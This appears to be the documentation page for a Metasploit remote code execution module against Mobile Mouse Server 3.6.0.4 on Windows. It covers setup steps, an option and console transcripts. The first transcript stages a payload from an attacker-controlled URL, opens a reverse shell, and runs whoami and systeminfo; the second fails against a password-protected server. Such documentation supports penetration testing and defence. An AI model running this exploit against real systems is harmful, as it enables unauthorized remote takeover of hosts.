## Vulnerable Application This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.6.0.4, current at the time of module writing Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/windows/misc/mobile_mouse_rce` 4. Set `rhost` and `lhost` as required. 5. Do: `run` 6. You should get a shell as the user who is running Mobile Mouse. ## Options ### SLEEP The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `3`, but can be a little touchy. ## Scenarios ### Mobile Mouse 3.6.0.4 on Windows 10 ``` resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce [*] Using configured payload windows/shell/reverse_tcp resource (mobile_mouse.rb)> set rhosts 1.1.1.1 rhosts => 1.1.1.1 resource (mobile_mouse.rb)> set lhost 2.2.2.2 lhost => 2.2.2.2 resource (mobile_mouse.rb)> set verbose true verbose => true msf6 exploit(windows/misc/mobile_mouse_rce) > run [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:9099 - Client name set to: M6braOok6j [*] 1.1.1.1:9099 - Connecting [+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D [*] 1.1.1.1:9099 - Opening Command Prompt [*] 1.1.1.1:9099 - Sending stager [*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/ [+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging [*] 1.1.1.1:9099 - Opening Command Prompt again [+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging [*] 1.1.1.1:9099 - Executing payload [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 1.1.1.1 [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400 [*] 1.1.1.1:9099 - Server stopped. [!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target Shell Banner: Microsoft Windows [Version 10.0.16299.125] ----- C:\Windows\Temp>whoami whoami win10prolicense\windows C:\Windows\Temp>systeminfo systeminfo Host Name: WIN10PROLICENSE OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299 ``` ### Mobile Mouse 3.6.0.4 on Windows 10, with a password This should fail as the exploit was not written to work with a password. ``` resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce [*] Using configured payload windows/shell/reverse_tcp resource (mobile_mouse.rb)> set rhosts 1.1.1.1 rhosts => 1.1.1.1 resource (mobile_mouse.rb)> set lhost 2.2.2.2 lhost => 2.2.2.2 resource (mobile_mouse.rb)> set verbose true verbose => true msf6 exploit(windows/misc/mobile_mouse_rce) > run [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q [*] 1.1.1.1:9099 - Connecting [-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password [*] Exploit completed, but no session was created. ```